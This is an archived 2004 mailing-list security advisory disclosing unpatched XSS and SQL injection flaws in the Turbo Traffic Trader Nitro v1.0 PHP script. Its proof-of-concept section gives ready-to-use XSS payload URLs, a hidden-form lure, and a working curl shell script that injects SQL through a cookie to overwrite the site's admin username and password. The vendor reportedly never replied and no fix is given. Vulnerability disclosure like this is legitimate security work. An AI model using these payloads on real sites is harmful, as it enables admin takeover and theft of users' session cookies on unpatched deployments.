lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
From: acidbits at gmail.com (aCiDBiTS)
Subject: Turbo Traffic Trader Nitro v1.0 SQL Injection & XSS Proofs of Concept

+-----------------------------------------------------------------------+
| Turbo Traffic Trader Nitro v1.0 SQL Injection & XSS Proofs of Concept |
| By aCiDBiTS              acidbits@...il.com               10-Oct-2004 |
+-----------------------------------------------------------------------+

    [                                              ]
	[ Your web application needs a security audit? ]
    [                 Email me !                   ] 
	[                                              ]

------------
Introduction
------------

Turbo traffic trader Nitro v1.0
(http://www.turbotraffictrader.com/php/) "is a fully automated traffic
trading script", "The World's Most Advanced Free PHP Traffic Trading
Script".


---------------
Vulnerabilities
---------------

There is no user input sanitation for many parameters in different
files. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code,
or to steal the user-cookie through XSS for the site where TTT is
running. The SQL injections only can be performed if the site server
has magic quotes set to off. The XSS can be exploited in two ways, one
only works if register globals are set to on the other always do.

Maybe older versions also vulnerable. These are just some examples,
this script has other ways to be exploited. Vendor has been warned but
had no reply from him.


-----------------
Proofs of concept
-----------------

(1.) XSS 
--------

Through GET, only works if register globals are set to on. From your
browser type:

http://URL_to_ttt_script/ttt-webmaster.php?msg[0]=%3Cscript%3Ealert(String.fromCharCode(88)%2BString.fromCharCode(83)%2BString.fromCharCode(83));%3C/script%3E


(2.) XSS
-------- 

Through POST, the victim should click something like this: 

<form action="http://URL_to_ttt_script/ttt-webmaster.php"
method="post"><input name="wm_email" type="hidden" value="fake"><input
name="addtrade" type="hidden" value="1"><input name="siteurl"
type="hidden" value="&lt;script&gt;alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83));&lt;/script&gt;
"><input name="" type="submit" value="Click me !"></form>


(3.) SQL Injection
------------------

With this you can set whatever username and password for TTT script
admin. Only works if the site server has magic quotes turned off.

ttt_sqli_poc.sh
-------8<----------------------8<---------------------8<----------------------------
#!/bin/sh
echo "+----------------------------------------------------------------+"
echo "| Turbo Traffic Trader Nitro v1.0 SQL Injection Proof of Concept |"
echo "| By aCiDBiTS           acidbits@...il.com           10-Oct-2004 |"
echo "+----------------------------------------------------------------+"
echo ""
if test $# -lt 3; then 
	echo "Usage: $0  URL_to_ttt_script  new_username  new_password"
	echo "Eg:  ./ttt_sqli_poc http://127.0.0.1/ttt john 1234"
	echo ""
	exit
fi
echo "[+] Setting username: $2"
echo "            password: $3"
echo ""
curl -s -o "/dev/null" -b
"ttt_admin=9999999999%7Cfake%7C%27)AS%20pass2,%27fake%27%20as%20username,%27fake%27%20as%20password,(%27fake"
-d "changepass=1&username=$2&password=$3&password2=$3"
"$1/tttadmin/settings.php"
echo "[+] Now go to $1/tttadmin and good login ;-)"
echo ""
echo " \  /"
echo " (Oo)"
echo "//||\\\\"
-------8<----------------------8<---------------------8<----------------------------


---------
Quick Fix
---------

No fix at this moment. Too many parts of the code have to be patched.


Powered by blists - more mailing lists